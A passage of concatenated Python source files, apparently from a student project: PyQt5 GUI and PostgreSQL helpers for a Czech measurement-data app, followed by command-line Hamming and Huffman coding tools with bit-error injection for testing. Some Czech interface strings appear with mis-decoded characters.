return cur.fetchall()
def get_measurements_count(filter_=None, *args):
sql = 'select count(1) from "measurements_view"'
with conn.cursor() as cur:
cur.execute(sql + filter_to_sql(cur, filter_))
return cur.fetchone()[0]
def get_logs(filter_=None, offset=0, limit=20):
sql_begin = 'select "created" at time zone \'utc\', "operation", "tablename", \
"description" from "logs"'
with conn.cursor() as cur:
sql = sql_begin + filter_to_sql(cur, filter_)
sql = sql + cur.mogrify('order by "created" desc offset %s limit %s',
(offset, limit)).decode('utf-8')
cur.execute(sql)
return cur.fetchall()
def filter_to_sql(cur, filter_):
def join_conditions(original, additional, operator='and'):
additional = ' ' + additional + ' '
if not original:
return additional
return original + ' ' + operator + ' ' + additional
if not filter_:
return ''
conditions = ''
if 'operation' in filter_:
additional = cur.mogrify('"operation" = %s', (filter_['operation'],)).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'tablename' in filter_:
additional = cur.mogrify('"tablename" = %s', (filter_['tablename'],)).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'block' in filter_:
additional = cur.mogrify('block_id = %s', (filter_['block'],)).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'device' in filter_:
additional = cur.mogrify('serial_number = %s', (filter_['device'],)).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'unit' in filter_:
additional = cur.mogrify('unit = %s', (filter_['unit'],)).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'start_datetime' in filter_ and 'end_datetime' in filter_:
additional = cur.mogrify('created between %s and %s',
(filter_['start_datetime'], filter_['end_datetime'],)).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'loc_x' in filter_ and 'loc_tol' in filter_:
additional = cur.mogrify('loc_x between %s and %s',
(float(filter_['loc_x']) - float(filter_['loc_tol']),
float(filter_['loc_x']) + float(filter_['loc_tol']))).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'loc_y' in filter_ and 'loc_tol' in filter_:
additional = cur.mogrify('loc_y between %s and %s',
(float(filter_['loc_y']) - float(filter_['loc_tol']),
float(filter_['loc_y']) + float(filter_['loc_tol']))).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'deviated_values' in filter_ and \
filter_['deviated_values'] == True:
additional = 'difference > unit_deviation'
conditions = join_conditions(conditions, additional)
return ' where ' + conditions
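# Illustrative example of the filter dict expected by filter_to_sql (all keys are optional;
# the key names are taken from the checks above):
#
#   filter_ = {"block": 4, "device": "rm2-x", "unit": "Hz", "deviated_values": True,
#              "start_datetime": datetime(2015, 5, 7, 10),
#              "end_datetime": datetime(2015, 5, 8, 10)}
#   get_measurements(filter_, offset=0, limit=20)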
def import_data(data):
"""Performs multiple insert of data."""
sql = 'insert into rdb."raw_data_view"("created", "unit", "location_id", \
"longitude", "latitude", "location_description", "value1", \
"value2", "unit_deviation", "serial_number", "device_deviation", "device_description", \
"block_id", "block_description") values '
with conn.cursor() as cur:
args_str = ','.join(_get_import_values_string(cur, row) for row in data)
cur.execute(sql + args_str)
conn.commit()
def _get_import_values_string(cur, row):
row[0] = datetime.utcfromtimestamp(int(row[0]))
return cur.mogrify("(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)",
row).decode('utf-8')
def export_data(filename, filter_=None):
"""Exports all raw_data."""
subquery = """
select (select round(extract(epoch from "created" at time zone 'utc'))),\
"unit", "location_id", \
"longitude", "latitude", "location_description", "value1", \
"value2", "unit_deviation", "serial_number", "device_deviation", "device_description", \
"block_id", "block_description"
from rdb."raw_data_view"
"""
query = "COPY ({0}) TO STDOUT WITH CSV DELIMITER ';'"
with conn.cursor() as cur:
subquery = subquery + filter_to_sql(cur, filter_)
query = query.format(subquery)
with open(filename, 'w') as f:
cur.copy_expert(query, f)
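# Illustrative call (not part of the original module): export every measurement taken by
# one device into a CSV file, reusing the same filter dict as the query helpers above.
#
#   export_data("export.csv", {"device": "rm2-x"})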
def execute(function, callback=None, *args, **kwargs):
if callable(function):
queue.append(
{'function': function, \
'callback': callback, \
'args': args, \
'kwargs': kwargs})
_startExecution()
def _startExecution():
if thread.done and queue:
function = queue[0]['function']
args = queue[0]['args']
kwargs = queue[0]['kwargs']
thread.execute(function, *args, **kwargs)
@pyqtSlot(dict)
def _on_thread_executed(dict_):
callback = queue[0]['callback']
del queue[0]
_startExecution()
if callable(callback):
callback(dict_['returnValue'])
class FunctionThread(QThread):
executed = pyqtSignal(dict)
def __init__(self, parent=None):
super(FunctionThread, self).__init__(parent)
self.mutex = QMutex()
self.function = None
self.args = None
self.kwargs = None
self.returnValue = None
self.finished.connect(self.on_thread_finished)
self.done = True
def __del__(self):
self.wait()
def execute(self, function, *args, **kwargs):
locker = QMutexLocker(self.mutex)
self.function = function
self.args = args
self.kwargs = kwargs
self.done = False
self.start()
def run(self):
returnValue = self.function(*self.args, **self.kwargs)
self.mutex.lock()
self.returnValue = returnValue
self.mutex.unlock()
def on_thread_finished(self):
result = {'returnValue': self.returnValue}
self.done = True
self.executed.emit(result)
@atexit.register
def unload_module():
"""Close db connection when module is unloaded."""
conn.close()
thread = FunctionThread()
queue = []
thread.executed.connect(_on_thread_executed)
if __name__ == "__main__":
import sys
from PyQt5.QtCore import QCoreApplication
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL)
app = QCoreApplication(sys.argv)
print('before')
execute(get_blocks, print)
print('between')
execute(get_devices, print)
print('after')
app.exec_()
```
#### File: app/ui/filteringwidget.py
```python
from PyQt5.QtCore import Qt, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import (QWidget, QHBoxLayout, QPushButton, QLabel,
QDialog)
from copy import deepcopy
from datetime import timezone
from .filterdialog import FilterDialog
class FilteringWidget(QWidget):
filterChanged = pyqtSignal(dict)
@staticmethod
def filterToText(filter_):
def appendText(original, additional):
if not original:
return additional
return original + ', ' + additional
if not filter_:
return "(ลพรกdnรฝ)"
text = ""
if 'block' in filter_:
text = appendText(text, 'Skupina mฤลenรญ: %s' % filter_['block'])
if 'device' in filter_:
text = appendText(text, 'Pลรญstroj: %s' % filter_['device'])
if 'unit' in filter_:
text = appendText(text, 'Jednotka: %s' % filter_['unit'])
if 'start_datetime' in filter_:
text = appendText(text, 'Od: %s' % \
utc_to_local(filter_['start_datetime']).
strftime('%Y-%m-%d %H:%M:%S'))
if 'end_datetime' in filter_:
text = appendText(text, 'Do: %s' % \
utc_to_local(filter_['end_datetime']).
strftime('%Y-%m-%d %H:%M:%S'))
if 'loc_x' in filter_:
try:
text = appendText(text, 'Lokace: (%s, %s, +-%s)' %
(filter_['loc_x'], filter_['loc_y'], filter_['loc_tol']))
except KeyError:
pass
if 'deviated_values' in filter_ and \
filter_['deviated_values'] == True:
text = appendText(text, 'Mimo odchylku')
return text
def __init__(self, parent=None):
super(FilteringWidget, self).__init__(parent)
self._filter = {}
self.label = QLabel(self)
self.label.setWordWrap(True)
self.label.setText(self.filterToText(self._filter))
self.changeFilter = QPushButton(self)
self.changeFilter.setText("Upravit filtr")
self.changeFilter.clicked.connect(self.on_changeFilter_clicked)
self.removeFilter = QPushButton(self)
self.removeFilter.setText("Smazat filtr")
self.removeFilter.clicked.connect(self.on_removeFilter_clicked)
layout = QHBoxLayout()
layout.addWidget(QLabel("Aktivnรญ filtr: "))
layout.addWidget(self.label)
layout.setStretch(1, 1)
layout.addWidget(self.changeFilter)
layout.addWidget(self.removeFilter)
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
self.setMinimumHeight(60)
@pyqtSlot()
def on_changeFilter_clicked(self):
filterDialog = FilterDialog()
filterDialog.initControls(self.options, self._filter)
if filterDialog.exec_() == QDialog.Accepted:
self.setFilter(filterDialog.filter())
@pyqtSlot()
def on_removeFilter_clicked(self):
self.setFilter({})
def setFilter(self, filter_):
self._filter = filter_
self.onFilterChange()
def setOptions(self, options):
self.options = options
def onFilterChange(self):
self.label.setText(self.filterToText(self._filter))
self.filterChanged.emit(self._filter)
def filter(self):
return self._filter
def utc_to_local(utc_dt):
return utc_dt.replace(tzinfo=timezone.utc).astimezone(tz=None)
if __name__ == '__main__':
import sys
from PyQt5.QtWidgets import QApplication
from datetime import datetime
app = QApplication(sys.argv)
options = {'block': [1, 2, 3, 4, 5], \
'device': ['rm2-x', 'zc-3d', 'qap'], \
'unit': ['Hz', 'A', 'm^2']}
filter_ = {'block': 4, 'unit': 'Hz', 'deviated_values': True, \
'start_datetime': datetime(2015,5,7,10)}
widget = FilteringWidget()
widget.setOptions(options)
widget.setFilter(filter_)
widget.show()
sys.exit(app.exec_())
```
#### File: app/ui/logswidget.py
```python
from PyQt5.QtCore import Qt, pyqtSignal, pyqtSlot, QTimeZone, QDateTime
from PyQt5.QtWidgets import (QWidget, QHBoxLayout, QPushButton, QLabel,
QDialog, QVBoxLayout, QComboBox, QDateTimeEdit, QFormLayout, QHBoxLayout)
from datetime import datetime, timezone
import calendar
from .filteringwidget import FilteringWidget
from .paginatortablewidget import PaginatorTableWidget
class LogsWidget(QWidget):
requestData = pyqtSignal(dict, int, int)
def __init__(self, parent=None):
super(LogsWidget, self).__init__(parent)
self.offset = 0
self.limit = PaginatorTableWidget.PAGE_ROW_COUNT
self._filter = {}
self.filtering = LogFilteringWidget()
self.filtering.filterChanged.connect(self.on_filterChanged)
self.table = PaginatorTableWidget()
self.table.layout().setContentsMargins(0, 0, 0, 0)
self.table.setPageRowCount(self.limit)
self.table.requestData.connect(self.on_table_requestData)
self.table.setColumnHeaders(['Datum a ฤas', 'Operace',
'Tabulka', 'Popis'])
header = self.table.table.horizontalHeader()
header.resizeSection(0, 190)
header.resizeSection(1, 110)
header.resizeSection(2, 110)
header.resizeSection(3, 110)
layout = QVBoxLayout()
layout.addWidget(self.filtering)
layout.addWidget(self.table)
self.setLayout(layout)
@pyqtSlot(int, int)
def on_table_requestData(self, offset, limit):
self.offset = offset
self.limit = limit
self.requestData.emit(self._filter, self.offset, self.limit)
@pyqtSlot(dict)
def on_filterChanged(self, filter_):
self._filter = filter_
self.table.controls.counter.setValue(1)
self.requestData.emit(self._filter, self.offset, self.limit)
def setData(self, data):
self.table.setData(data)
def setMaxRowCount(self, rowCount):
self.table.setMaxRowCount(rowCount)
def setFilterOptions(self, options):
self.filtering.setOptions(options)
def setFilter(self, filter_):
self.filtering.setFilter(filter_)
def filter(self):
return self._filter
def updateData(self):
self.requestData.emit(self._filter, self.offset, self.limit)
class LogFilteringWidget(FilteringWidget):
@staticmethod
def filterToText(filter_):
def appendText(original, additional):
if not original:
return additional
return original + ', ' + additional
if not filter_:
return "(ลพรกdnรฝ)"
text = ""
if 'operation' in filter_:
text = appendText(text, 'Operace: %s' % filter_['operation'])
if 'tablename' in filter_:
text = appendText(text, 'Tabulka: %s' % filter_['tablename'])
if 'start_datetime' in filter_:
text = appendText(text, 'Od: %s' % \
utc_to_local(filter_['start_datetime']).
strftime('%Y-%m-%d %H:%M:%S'))
if 'end_datetime' in filter_:
text = appendText(text, 'Do: %s' % \
utc_to_local(filter_['end_datetime']).
strftime('%Y-%m-%d %H:%M:%S'))
return text
@pyqtSlot()
def on_changeFilter_clicked(self):
pass
filterDialog = LogFilterDialog()
filterDialog.initControls(self._filter)
if filterDialog.exec_() == QDialog.Accepted:
self.setFilter(filterDialog.filter())
TZ = QTimeZone('Europe/Prague')
class LogFilterDialog(QDialog):
OPERATION_OPTIONS = ['', 'insert', 'delete']
TABLENAME_OPTIONS = ['', 'blocks', 'devices', 'measurements',\
'raw_data_view']
def __init__(self, parent=None):
super(LogFilterDialog, self).__init__(parent)
self.accepted.connect(self.createFilter)
self.operationCombo = QComboBox()
self.operationCombo.addItems(LogFilterDialog.OPERATION_OPTIONS)
self.tablenameCombo = QComboBox()
self.tablenameCombo.addItems(LogFilterDialog.TABLENAME_OPTIONS)
self.fromEdit = QDateTimeEdit()
self.toEdit = QDateTimeEdit()
groupLayout = QFormLayout()
groupLayout.addRow("Od: ", self.fromEdit)
groupLayout.addRow("Do: ", self.toEdit)
groupLayout.addRow("Operace: ", self.operationCombo)
groupLayout.addRow("Tabulka: ", self.tablenameCombo)
rejectButton = QPushButton("Storno")
rejectButton.clicked.connect(self.reject)
acceptButton = QPushButton("OK")
acceptButton.clicked.connect(self.accept)
buttonsLayout = QHBoxLayout()
buttonsLayout.addStretch(1)
buttonsLayout.addWidget(acceptButton)
buttonsLayout.addWidget(rejectButton)
layout = QVBoxLayout()
layout.addLayout(groupLayout)
layout.addSpacing(12)
layout.addLayout(buttonsLayout)
self.setLayout(layout)
self.setMinimumWidth(300)
self.setWindowTitle("Filtrovรกnรญ logลฏ")
def initControls(self, filter_):
selected = filter_.get('operation', '')
try:
index = LogFilterDialog.OPERATION_OPTIONS.index(selected)
except ValueError:
index = 0
self.operationCombo.setCurrentIndex(index)
selected = filter_.get('tablename', '')
try:
index = LogFilterDialog.TABLENAME_OPTIONS.index(selected)
except ValueError:
index = 0
self.tablenameCombo.setCurrentIndex(index)
start = filter_.get('start_datetime', None)
if start is None:
start = datetime.utcnow()
start = calendar.timegm(start.timetuple()) - 3600*24
else:
start = calendar.timegm(start.timetuple())
end = filter_.get('end_datetime', datetime.utcnow())
end = calendar.timegm(end.timetuple())
self.fromEdit.setDateTime(QDateTime.fromTime_t(start, TZ))
self.toEdit.setDateTime(QDateTime.fromTime_t(end, TZ))
def getFilter(self):
filter_ = {}
start = self.fromEdit.dateTime().toTime_t()
end = self.toEdit.dateTime().toTime_t()
filter_['start_datetime'] = datetime.utcfromtimestamp(start)
filter_['end_datetime'] = datetime.utcfromtimestamp(end)
if self.operationCombo.currentText():
filter_['operation'] = self.operationCombo.currentText()
if self.tablenameCombo.currentText():
filter_['tablename'] = self.tablenameCombo.currentText()
return filter_
@pyqtSlot()
def createFilter(self):
self._filter = self.getFilter()
def filter(self):
return self._filter
def utc_to_local(utc_dt):
return utc_dt.replace(tzinfo=timezone.utc).astimezone(tz=None)
```
#### File: app/ui/mainwindow.py
```python
from PyQt5.QtWidgets import (QMainWindow, qApp, QMessageBox, QFileDialog,
QDialog)
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import pyqtSlot
from copy import deepcopy
from .. import database as db
from .importdialog import ImportDialog
from .deviceswidget import DevicesWidget
from .blockswidget import BlocksWidget
from .measurementswidget import MeasurementsWidget
from .exportdialog import ExportDialog
from .logswidget import LogsWidget
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.options = {}
self.setupUi(self)
self.updateData()
self.on_requestBlockData(self.blocksWidget.filter())
self.on_requestMeasurementData(self.measurementsWidget.filter(),
self.measurementsWidget.offset, self.measurementsWidget.limit)
self.on_requestLogData(self.logsWidget.filter(),
self.logsWidget.offset, self.logsWidget.limit)
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(800, 600)
# TABS
self.tabsWidget = QtWidgets.QTabWidget(MainWindow)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding,
QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tabsWidget.sizePolicy().
hasHeightForWidth())
self.tabsWidget.setSizePolicy(sizePolicy)
self.tabsWidget.currentChanged.connect(self.on_tabChanged)
self.devicesWidget = DevicesWidget()
self.devicesWidget.removeDevice.connect(self.on_removeDevice)
self.blocksWidget = BlocksWidget()
self.blocksWidget.removeBlock.connect(self.on_removeBlock)
self.blocksWidget.requestData.connect(self.on_requestBlockData)
self.blocksWidget.requestDetail.connect(self.on_requestBlockDetail)
self.measurementsWidget = MeasurementsWidget()
self.measurementsWidget.requestData.connect(self.on_requestMeasurementData)
self.logsWidget = LogsWidget()
self.logsWidget.requestData.connect(self.on_requestLogData)
self.tabsWidget.addTab(self.blocksWidget, "Skupiny mฤลenรญ")
self.tabsWidget.addTab(self.measurementsWidget, "Namฤลenรฉ hodnoty")
self.tabsWidget.addTab(self.devicesWidget, "Pลรญstroje")
self.tabsWidget.addTab(self.logsWidget, "Log")
self.setCentralWidget(self.tabsWidget)
# MENU
menuBar = QtWidgets.QMenuBar(MainWindow)
menuBar.setGeometry(QtCore.QRect(0, 0, 800, 20))
action_Import = QtWidgets.QAction(MainWindow)
action_Import.setText('&Import')
action_Import.triggered.connect(self.on_action_Import_triggered)
action_Export = QtWidgets.QAction(MainWindow)
action_Export.setText('&Export')
action_Export.triggered.connect(self.on_action_Export_triggered)
menu_File = QtWidgets.QMenu(menuBar)
menu_File.setTitle('&Soubor')
menu_File.addAction(action_Import)
menu_File.addAction(action_Export)
menuBar.addAction(menu_File.menuAction())
MainWindow.setMenuBar(menuBar)
self.setWindowTitle("RDB 2015 - Kลรญzek, Madฤra, Gabriel")
def setDevices(self, devices):
if devices:
self.devicesWidget.setData(devices)
self.options['device'] = [device[0] for device in devices]
self.on_options_updated()
@pyqtSlot(str)
def on_removeDevice(self, serial_number):
title = "Odstranit pลรญstroj %s?" % serial_number
text = "Odstranฤnรญm pลรญstroje se smaลพou i vลกechny jรญm namฤลenรฉ " + \
"hodnoty.\n\nOpravdu chcete odstranit pลรญstroj %s?" % \
serial_number
buttons = QMessageBox.Yes | QMessageBox.No
msgBox = QMessageBox(QMessageBox.Question, title, text, buttons)
if msgBox.exec_() == QMessageBox.Yes:
db.execute(db.remove_device, self.updateData, serial_number)
def setBlocks(self, blocks):
if blocks:
self.options['block'] = [block[0] for block in blocks]
self.on_options_updated()
@pyqtSlot(int)
def on_removeBlock(self, block_id):
title = "Odstranit mฤลรญcรญ blok %s?" % block_id
text = "Odstranฤnรญm mฤลรญcรญho bloku se smaลพou i vลกechny namฤลenรฉ " + \
"hodnoty v rรกmci tohoto bloku.\n\nOpravdu chcete " + \
"odstranit mฤลรญcรญ blok %s?" % block_id
buttons = QMessageBox.Yes | QMessageBox.No
msgBox = QMessageBox(QMessageBox.Question, title, text, buttons)
if msgBox.exec_() == QMessageBox.Yes:
db.execute(db.remove_block, self.on_blockRemoved, block_id)
def on_blockRemoved(self, *args):
db.execute(db.get_blocks, self.setBlocks)
self.blocksWidget.updateData()
@pyqtSlot(dict)
def on_requestBlockData(self, filter_):
db.execute(db.get_blocks, self.blocksWidget.setData, filter_)
@pyqtSlot(int)
def on_requestBlockDetail(self, block_id):
filter_ = deepcopy(self.blocksWidget.filter())
filter_['block'] = block_id
self.measurementsWidget.setFilter(filter_)
self.tabsWidget.setCurrentIndex(1)
def on_action_Import_triggered(self):
caption = 'Import csv dat'
dialog = QFileDialog(self, caption)
dialog.setFileMode(QFileDialog.ExistingFile)
dialog.setNameFilters(['CSV soubory (*.csv)', 'Vลกechny soubory (*)'])
if dialog.exec_():
importDialog = ImportDialog()
importDialog.setFilename(dialog.selectedFiles()[0])
importDialog.exec_()
self.updateData()
self.blocksWidget.updateData()
self.measurementsWidget.updateData()
def on_action_Export_triggered(self):
exportDialog = ExportDialog()
exportDialog.setFilterOptions(self.options)
filter_ = self.measurementsWidget.filter()
if self.tabsWidget.currentIndex() == 0:
            filter_ = self.blocksWidget.filter()
exportDialog.setFilter(filter_)
exportDialog.exec_()
def updateData(self, *args):
db.execute(db.get_blocks, self.setBlocks)
db.execute(db.get_devices, self.setDevices)
db.execute(db.get_units, self.setUnits)
def setUnits(self, units):
if units:
self.options['unit'] = [unit[0] for unit in units]
self.on_options_updated()
def on_options_updated(self):
self.blocksWidget.setFilterOptions(self.options)
self.measurementsWidget.setFilterOptions(self.options)
@pyqtSlot(dict, int, int)
def on_requestMeasurementData(self, filter_, offset, limit):
# db.execute(db.get_measurements_count,
# self.measurementsWidget.setMaxRowCount,
# filter_)
db.execute(db.get_measurements,
self.measurementsWidget.setData,
filter_, offset, limit)
@pyqtSlot(dict, int, int)
def on_requestLogData(self, filter_, offset, limit):
db.execute(db.get_logs, self.logsWidget.setData,
filter_, offset, limit)
@pyqtSlot(int)
def on_tabChanged(self, index):
if index == 3:
self.logsWidget.updateData()
```
#### File: app/ui/measurementswidget.py
```python
from PyQt5.QtCore import Qt, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import QVBoxLayout, QWidget
from .filteringwidget import FilteringWidget
from .paginatortablewidget import PaginatorTableWidget
class MeasurementsWidget(QWidget):
requestData = pyqtSignal(dict, int, int)
def __init__(self, parent=None):
super(MeasurementsWidget, self).__init__(parent)
self.offset = 0
self.limit = PaginatorTableWidget.PAGE_ROW_COUNT
self._filter = {}
self.filtering = FilteringWidget()
self.filtering.filterChanged.connect(self.on_filterChanged)
self.table = PaginatorTableWidget()
self.table.layout().setContentsMargins(0, 0, 0, 0)
self.table.setPageRowCount(self.limit)
self.table.requestData.connect(self.on_table_requestData)
self.table.setColumnHeaders(['Datum a ฤas', 'Hodnota 1', 'Hodnota 2',
'Rozdรญl hodnot', 'Pลรญstroj', 'Odchylka'])
header = self.table.table.horizontalHeader()
header.resizeSection(0, 190)
header.resizeSection(1, 110)
header.resizeSection(2, 110)
header.resizeSection(3, 110)
header.resizeSection(4, 160)
layout = QVBoxLayout()
layout.addWidget(self.filtering)
layout.addWidget(self.table)
self.setLayout(layout)
@pyqtSlot(int, int)
def on_table_requestData(self, offset, limit):
self.offset = offset
self.limit = limit
self.requestData.emit(self._filter, self.offset, self.limit)
@pyqtSlot(dict)
def on_filterChanged(self, filter_):
self._filter = filter_
self.table.controls.counter.setValue(1)
self.requestData.emit(self._filter, self.offset, self.limit)
def setData(self, data):
self.table.setData(data)
def setMaxRowCount(self, rowCount):
self.table.setMaxRowCount(rowCount)
def setFilterOptions(self, options):
self.filtering.setOptions(options)
def setFilter(self, filter_):
self.filtering.setFilter(filter_)
def filter(self):
return self._filter
def updateData(self):
self.requestData.emit(self._filter, self.offset, self.limit)
if __name__ == '__main__':
import sys
from PyQt5.QtWidgets import QApplication
from datetime import datetime
app = QApplication(sys.argv)
options = {'block': [1, 2, 3, 4, 5], \
'device': ['rm2-x', 'zc-3d', 'qap'], \
'unit': ['Hz', 'A', 'm^2']}
filter_ = {'block': 4, 'unit': 'Hz', 'deviated_values': True, \
'start_datetime': datetime(2015,5,7,10)}
widget = MeasurementsWidget()
widget.setFilterOptions(options)
widget.setFilter(filter_)
widget.setMaxRowCount(100)
@pyqtSlot(dict, int, int)
def handle_requestData(filter_, offset, limit):
print(filter_, offset, limit)
widget.requestData.connect(handle_requestData)
widget.setData([[1, 2, 3,4,5, 6], [3, 5, 6, 7, 8, 9]])
widget.show()
sys.exit(app.exec_())
```
#### File: app/ui/paginationcontrols.py
```python
from PyQt5.QtCore import pyqtSlot, pyqtSignal
from PyQt5.QtWidgets import (QWidget, QHBoxLayout, QPushButton, QSpinBox)
class PaginationControls(QWidget):
PAGE_ROW_COUNT = 10
valueChanged = pyqtSignal(int)
def __init__(self, parent=None):
super(PaginationControls, self).__init__(parent)
self.counter = QSpinBox(self)
self.startButton = QPushButton(self)
self.prevButton = QPushButton(self)
self.nextButton = QPushButton(self)
self.endButton = QPushButton(self)
self.createGUI()
self.updateControls()
def createGUI(self):
self.startButton.setText("<<")
self.startButton.clicked.connect(self.on_startButton_clicked)
self.prevButton.setText("<")
self.prevButton.clicked.connect(self.on_prevButton_clicked)
self.nextButton.setText(">")
self.nextButton.clicked.connect(self.on_nextButton_clicked)
self.endButton.setText(">>")
self.endButton.clicked.connect(self.on_endButton_clicked)
self.counter.setMinimum(1)
self.counter.valueChanged.connect(self.on_counter_valueChanged)
layout = QHBoxLayout(self)
layout.addWidget(self.startButton)
layout.addWidget(self.prevButton)
layout.addWidget(self.counter)
layout.addWidget(self.nextButton)
layout.addWidget(self.endButton)
self.setLayout(layout)
def updateControls(self):
page = self.counter.value()
self.startButton.setEnabled(True)
self.prevButton.setEnabled(True)
self.nextButton.setEnabled(True)
self.endButton.setEnabled(True)
# end conditions for button enables/disables
if page == 1:
self.startButton.setEnabled(False)
self.prevButton.setEnabled(False)
if page == self.counter.maximum():
self.endButton.setEnabled(False)
self.nextButton.setEnabled(False)
def setMaximum(self, maximum):
self.counter.setMaximum(maximum)
self.updateControls()
@pyqtSlot()
def on_startButton_clicked(self):
self.counter.setValue(1)
@pyqtSlot()
def on_prevButton_clicked(self):
self.counter.setValue(self.counter.value() - 1)
@pyqtSlot()
def on_nextButton_clicked(self):
self.counter.setValue(self.counter.value() + 1)
@pyqtSlot()
def on_endButton_clicked(self):
self.counter.setValue(self.counter.maximum())
@pyqtSlot(int)
def on_counter_valueChanged(self, value):
self.updateControls()
self.valueChanged.emit(value)
if __name__ == '__main__':
import sys
from PyQt5.QtWidgets import QApplication
app = QApplication(sys.argv)
widget = PaginationControls()
widget.show()
sys.exit(app.exec_())
``` |
{
"source": "johnymachine/kas",
"score": 3
} |
#### File: kas/hamming-python/hamming_main.py
```python
import argparse
import time
import os
import hammcoder
import binpacker
import errormaker
def setup_parser():
'''
Basic parser setup for simple hamming command line input.
'''
parser = argparse.ArgumentParser(description='Command line hamming coder')
parser.add_argument("-i", "--input", required=True,
help="Insert path to input file.")
parser.add_argument("-o", "--output", required=True,
help="Insert path to output file.")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-K", "--encode", action="store_true",
help="Swiches to encoding")
group.add_argument("-D", "--decode", action="store_true",
help="Swiches to decoding")
group.add_argument("-1", "--singleerror", action="store_true",
help="Injects input file with single bit errors")
group.add_argument("-2", "--doubleerror", action="store_true",
help="Injects input file with double bit errors")
group.add_argument("-3", "--tripleerror", action="store_true",
help="Injects input file with triple bit errors")
group.add_argument("-R", "--randomerror", action="store_true",
help="Injects input file with random bit errors")
return parser
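# Example invocations (illustrative; flags are taken from the parser above):
#   python hamming_main.py -i input.txt -o output.hamm -K           # encode
#   python hamming_main.py -i output.hamm -o input.rebuild.txt -D   # decode
#   python hamming_main.py -i output.hamm -o noisy.hamm -1          # inject single-bit errors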
def main():
'''
Main program handler
'''
parser = setup_parser()
args = parser.parse_args()
inputfile = args.input
outputfile = args.output
#inputfile = "input.txt"
#outputfile = "output.hamm"
#inputfile = "output.hamm"
#outputfile = "input.rebulild.txt"
##inputfile = "output.hamm"
##outputfile = "output.singleerrors.hamm"
#inputfile = "output.singleerrors.hamm"
#outputfile = "input.rebulild.txt"
print "Welcome to Hamming code command line tool."
print "<NAME> (jan.gabriel(at)tul.cz"
print "========================================================"
print "from: " + inputfile + " =====>>>>> to: " + outputfile
if(args.encode):
print "You have selected to ENCODE"
print "========================================================"
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToEncode(ifile)
output = hammcoder.hammingEncode(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToEncode(ofile, output)
end_time = time.time()
oldsize = os.path.getsize(inputfile)
newsize = os.path.getsize(outputfile)
compratio = (newsize / float(oldsize)) * 100
insec = end_time - start_time
print "You have succesfully ENCODED the file!"
print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
newsize / 1000.0, compratio) + "% increase in file size."
print "===================In: %.5s seconds!===================" % insec
elif(args.decode):
print "You have selected to DECODE"
print "========================================================"
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToDecode(ifile)
output = hammcoder.hammingDecode(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToDecode(ofile, output["output"])
end_time = time.time()
oldsize = os.path.getsize(inputfile)
newsize = os.path.getsize(outputfile)
compratio = (newsize / float(oldsize)) * 100
insec = end_time - start_time
if len(output["log"]) == 0:
print "You have succesfully DECODED the file!"
else:
for log in output["log"]:
print log
print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
newsize / 1000.0, compratio) + "% decrease in file size."
print "===================In: %.5s seconds!===================" % insec
elif(args.singleerror or args.doubleerror
or args.tripleerror or args.randomerror):
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToDecode(ifile)
if(args.singleerror):
print "You have selected to INJECT SINGLE ERRORS"
print "========================================================"
buff = errormaker.makeSingleError(buff)
elif(args.doubleerror):
print "You have selected to INJECT DOUBLE ERRORS"
print "========================================================"
buff = errormaker.makeDoubleError(buff)
elif(args.tripleerror):
print "You have selected to INJECT TRIPLE ERRORS"
print "========================================================"
buff = errormaker.makeTripleError(buff)
elif(args.randomerror):
print "You have selected to INJECT RANDOM ERRORS"
print "========================================================"
buff = errormaker.makeRandomError(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToEncode(ofile, buff)
end_time = time.time()
insec = end_time - start_time
print "You have succesfully INJECTED ERRORS!"
print "===================In: %.5s seconds!===================" % insec
else:
print "Sorry, something went terribly wrong!"
os.system("pause")
return 0
if __name__ == "__main__":
main()
```
#### File: kas/huffman-python/huffman_main.py
```python
import argparse
import time
import os
import huffcoder
import binpacker
def setup_parser():
'''
Basic parser setup for simple huffman command line input.
'''
parser = argparse.ArgumentParser(description='Command line huffman coder')
parser.add_argument("-i", "--input", required=True,
help="Insert path to input file.")
parser.add_argument("-o", "--output", required=True,
help="Insert path to output file.")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-K", "--encode", action="store_true",
help="Swiches to encoding")
group.add_argument("-D", "--decode", action="store_true",
help="Swiches to decoding")
return parser
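# Example invocations (illustrative; flags are taken from the parser above):
#   python huffman_main.py -i input.txt -o output.huff -K             # encode
#   python huffman_main.py -i output.huff -o input.rebuild.txt -D     # decode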
def main():
'''
Main program handler
'''
parser = setup_parser()
args = parser.parse_args()
inputfile = args.input
outputfile = args.output
#inputfile = "output.huff"
#outputfile = "input.rebuild.txt"
#selection = "D"
print "Welcome to Huffman code command line tool."
print "<NAME> FMTUL (jan.gabriel(at)tul.cz"
print "========================================================"
print "from: " + inputfile + " =====>>>>> to: " + outputfile
if(args.encode):
print "You have selected to ENCODE"
print "========================================================"
start_time = time.time()
with open(inputfile, "rb") as ifile:
